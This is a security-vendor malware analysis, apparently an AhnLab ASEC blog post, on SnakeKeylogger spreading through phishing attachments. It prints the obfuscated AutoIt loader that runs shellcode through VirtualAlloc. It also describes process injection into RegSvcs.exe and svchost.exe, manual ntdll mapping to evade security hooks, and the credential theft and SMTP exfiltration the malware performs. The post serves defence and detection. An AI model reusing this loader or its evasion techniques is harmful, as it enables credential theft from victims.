“`html
- Short Summary: AhnLab Security Intelligence Center has reported the distribution of SnakeKeylogger malware via phishing emails. This Infostealer malware, developed in .NET, exfiltrates sensitive data through various channels, including email and FTP.
- Key Points:
- SnakeKeylogger is an Infostealer type of malware.
- It is distributed via phishing emails with executable attachments.
- The malware is composed of an obfuscated AutoIt script and two binary files.
- Data exfiltration methods include SMTP, FTP, and Telegram.
- The malware can inject itself into legitimate processes to avoid detection.
- Exfiltrated data includes login credentials, web data, and more from various applications.
- Threat actors can customize the SnakeKeylogger to include or exclude features.
- Users are advised to be cautious with unknown emails and executable attachments.
MITRE ATT&CK TTPs – created by AI
- Technique Name: Credential Dumping (T1003)
- Procedure: Exfiltrates account credentials from various applications including browsers and email clients.
- Technique Name: Process Injection (T1055)
- Procedure: Injects the SnakeKeylogger malware into legitimate processes to evade detection.
- Technique Name: Exfiltration Over Command and Control Channel (T1041)
- Procedure: Sends exfiltrated data via SMTP to the threat actor.
- Technique Name: Phishing (T1566)
- Procedure: Distributes malware through phishing emails with malicious attachments.
“`
AhnLab SEcurity intelligence Center (ASEC) has recently identified cases where the SnakeKeylogger malware is being distributed via email. SnakeKeylogger is an Infostealer type of malware developed using the .NET language, and it is characterized by its methods of data exfiltration through email, FTP, SMTP, or Telegram.
Figure 1. Phishing email
The initial distribution is typically done in the form of an email, as shown in Figure 1. It grabs the attention of recipients with relatively sensitive topics such as financial matters and prompts them to run the attached executable file (BankTran.exe).
The BankTran.exe file is an executable file (PE) compiled with an AutoIt script. When the internal AutoIt script is extracted, it reveals one AutoIt script and two binary files, totaling three files. The names and roles of each file are as follows:
| File Name | Type | Role |
| {Unknown}.au3 | Obfuscated AutoIt Script (Loader) | Loads teres |
| teres | ShellCode (Injector) | Decrypts and injects quinquenniad |
| quinquenniad | .NET PE (Encrypted SnakeKeylogger) | SnakeKeylogger malware |
Table 1. Types and roles of extracted files
This post will now examine the process of SnakeKeylogger being injected into legitimate processes, starting from the AutoIt script.
Figure 2. The extracted AutoIt script
#NoTrayIcon FileInstall("quinquenniad", @TempDir & "quinquenniad", 1) FileInstall("teres", @TempDir & "teres", 1) Global $v30rutgry = Execute('FileRead(FileOpen(@TempDir & "teres"))') $v30rutgry = Execute('StringReplace($V30rUtgRy, "1A6E71D4810309FDFC6D43D3E9A6A999A1918E3376ACA2EEC40F44C89B681ADD6AA0260BDF66FE84DA", "")') $t33106ba = DllCall(c30te6f("x/)84)2w", "AA"), c30te6f("8:6", "AA"), c30te6f("'928%3:2-2", "AA"), c30te6f("*;38*", "AA"), c30te6f("v", "AA"), c30te6f("*;38*", "AA"), BinaryLen($v30rutgry), c30te6f("*;38*", "AA"), c30te6f("vvvw>v", "AA"), c30te6f("*;38*", "AA"), c30te6f("vv>z", "AA")) $t33106ba = $t33106ba[0] $z374vm4oj = DllStructCreate(c30te6f("f):=(", "AA") & BinaryLen($v30rutgry) & c30te6f("!", "AA"), $t33106ba) DllStructSetData($z374vm4oj, 1, $v30rutgry) DllCallAddress(c30te6f(":4-", "AA"), $t33106ba + 9136)The AutoIt script is highly obfuscated, but the strings identified through the decryption logic are shown below.
From these visible strings, it can be inferred that the script aims to allocate space using VirtualAlloc and execute the malware within that allocated space.
| Decrypted Function and Argument Values | Result |
| c30te6f(“x/)84)2w”, “AA”) | Kernel32 |
| c30te6f(“8:6”, “AA”) | ptr |
| c30te6f(“‘928%3:2-2”, “AA”) | VirtualAlloc |
| c30te6f(“;38“, “AA”) | dword |
| c30te6f(“v”, “AA”) | 0 |
| c30te6f(“vvvw>v”, “AA”) | 0x3000 |
| c30te6f(“vv>z”, “AA”) | 0x40 |
| c30te6f(“f):=(“, “AA”) | byte [ |
| c30te6f(“!”, “AA”) | ] |
| c30te6f(“:4-“, “AA”) | int |
Table 2. Decrypted strings
The space allocated by VirtualAlloc is used to execute teres (ShellCode) that is created in the %Temp% directory.
Figure 3. teres (ShellCode) written into the space allocated by VirtualAlloc
ShellCode is responsible for injecting the SnakeKeylogger malware into legitimate processes.
SnakeKeylogger is encrypted in the quinquenniad file located in the same %Temp% directory and the list of processes that can be injected with the malware is shown below. The threat actor selects one of these processes for injection depending on the system environment.
C:WindowsMicrosoft.NETFrameworkv4.0.30319RegSvcs.exe
C:WindowsMicrosoft.NETFrameworkv2.0.50727RegSvcs.exe
C:WindowsSystem32svchost.exe
As shown in Figure 4, the encrypted quinquenniad file is decrypted within the ShellCode using a specific key.
Figure 4. Decrypted SnakeKeylogger (quinquenniad)
During the injection process, it was observed that ntdll.dll is manually mapped and used.
This technique is commonly employed by threat actors to bypass detection by anti-malware products that hook ntdll.dll. Related methods have been discussed in previous ASEC Blog posts [1][2].
Figure 5. ShellCode manually mapping ntdll.dll
Afterward, injection is performed into the newly created process and SnakeKeylogger becomes active.
During analysis, it was found that despite the malware’s name, the keylogger feature exists only in the code and does not operate. This information suggests that there might be an option to select features during the malware creation process. In other words, the threat actor can customize and create variants of SnakeKeylogger. Consequently, the SnakeKeylogger version being discussed here operates with only the feature to exfiltrate information. It exfiltrates data (such as account credentials) from services present on the system, including emails, browsers, FTP, and SNS.
The table below lists the information that is exfiltrated by SnakeKeylogger as it operates.
| Exfiltrated Information | Detailed Information | Targeted Programs |
| Browser | Login Data, Web Data, History, Cookies, and Top Sites | Amigo, Xpom, Kometa, Nichrome, Chrome, CocCoc, QQ Browser, Orbitum, Slimjet, Iridium, Vivaldi, Iron, Chromium, Ghost Browser, Cent Browser, Xvast, Chedot, Superbird, 360 Browser (English, Chinese), Comodo, Brave, Torch, UCBrowser, Blisk, Epic, Avast Browser, Kinza, BlackHawk, Citrio, Urn, Coowon, 7Star, QIP Surf, Sleipnir5, Chrome Canary, ChromePlus, Sputnik, Falkon, Edge, Opera, Liebao, Slim Browser, Firefox, SeaMonkey, IceDragon, CyberFox, PaleMoon, and WaterFox |
| IMAP Password, HTTP Password, POP3 Password, SMTP Password, and Account Info | Outlook, Foxmail, Thunderbird, and PostBox | |
| FTP | Host, Port, User, and Password | FileZilla |
| Etc | db, log, etc. | Pidgin, Discord |
Table 3. Exfiltrated data
The above user information that is exfiltrated is sent to the threat actor via SMTP. There are also methods for using Telegram and general HTTP for transmission found in the code, though they are not operational. Such operation method can also be seen as evidence of the customization option of the SnakeKeylogger malware mentioned earlier.
Figure 6. Using SMTP to transmit exfiltrated data to the threat actor
It is crucial to exercise caution when viewing emails from unknown sources as attacks via email have occurred frequently since the past. In particular, if an email contains an attached executable file with an exe extension, it is recommended not to run it.
File Detection
– Trojan/Win.Autoit.XG85
– Trojan/Win.SnakeKeylogger.R433068
– Trojan/Win.SnakeKeylogger.C5326084
– Trojan/AU3.Loader
– Trojan/BIN.Agent
– Trojan/BIN.Shellcode
Source : https://asec.ahnlab.com/en/82172/